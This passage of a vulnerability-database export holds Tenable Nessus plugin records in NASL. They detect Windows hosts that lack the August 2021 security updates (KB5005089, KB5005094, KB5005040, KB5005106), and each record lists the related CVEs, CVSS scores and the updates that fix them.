script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005088\");\n script_xref(name:\"MSKB\", value:\"5005089\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005088\");\n script_xref(name:\"MSFT\", value:\"MS21-5005089\");\n\n script_name(english:\"KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005089\nor cumulative update 5005088. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005089-security-only-update-28805642-8266-40f9-a2be-9003329f661c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?383d9541\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005088-monthly-rollup-69ec750d-30ee-4cbd-82eb-0b1ec2fd5f78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d931097\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005089 or Cumulative Update KB5005088.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005089',\n '5005088'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005089, 5005088])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005094 or cumulative update 5005099. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005094: Windows Server 2012 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005094.NASL", "href": "https://www.tenable.com/plugins/nessus/152421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152421);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005094\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005099\");\n script_xref(name:\"MSFT\", value:\"MS21-5005094\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005099\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005094: Windows Server 2012 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005094\nor cumulative update 5005099. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005094-security-only-update-276b95ad-c923-454c-8758-5b90175d86cc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed9c2c14\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005099-monthly-rollup-34a20feb-f899-4d10-91e0-d5ab32c4e009\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9af3c64c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005094 or Cumulative Update KB5005099.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005099',\n '5005094'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005099, 5005094])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:18", "description": "The remote Windows host is missing security update 5005040.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005040: Windows 10 version 1507 LTS Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005040.NASL", "href": "https://www.tenable.com/plugins/nessus/152422", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152422);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005040\");\n script_xref(name:\"MSFT\", value:\"MS21-5005040\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005040: Windows 10 version 1507 LTS Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005040.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005040-os-build-10240-19022-e8bbfa7a-1012-4e18-a2d7-8ae6a8acf8fb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cab780fc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005040.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005040'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:10240,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005040])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:06:25", "description": "The remote Windows host is missing security update 5005106 or cumulative update 5005076. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005106: Windows 8.1 and Windows Server 2012 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2023-09-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005106.NASL", "href": "https://www.tenable.com/plugins/nessus/152433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152433);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/22\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005076\");\n script_xref(name:\"MSKB\", value:\"5005106\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005076\");\n script_xref(name:\"MSFT\", value:\"MS21-5005106\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005106: Windows 8.1 and Windows Server 2012 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005106\nor cumulative update 5005076. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005076-monthly-rollup-bf677fed-96d9-475e-87c1-a053fa75fef7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e0382f6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005106-security-only-update-d1ab5a34-55c1-4f66-8776-54a0c3bf40a7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57da6a50\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005106 or Cumulative Update KB5005076.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005106',\n '5005076'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005106, 5005076])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:36", "description": "The remote Windows host is missing security update 5009601 or cumulative update 5009627. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - 